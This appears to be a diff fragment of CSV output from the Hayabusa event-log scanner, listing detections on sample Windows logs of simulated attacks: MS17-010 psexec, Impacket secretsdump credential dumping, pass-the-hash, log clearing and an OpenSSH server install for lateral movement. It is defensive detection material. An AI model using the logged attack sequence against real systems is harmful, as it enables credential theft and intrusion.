+2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb3084,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0xb3084,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb314d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0xb314d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb32cb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.258 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0xb32cb | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 19:02:14.393 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.406 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.619 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Apply-WindowsUnattend"" ParameterBinding(Set-Alias): name=""Value""; value=""Use-WindowsUnattend""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.619 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppxPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppXDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.622 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.622 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-AppProvisionedPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-AppPackageProvisionedDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppPackageDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:02:14.627 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Cmdlet""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
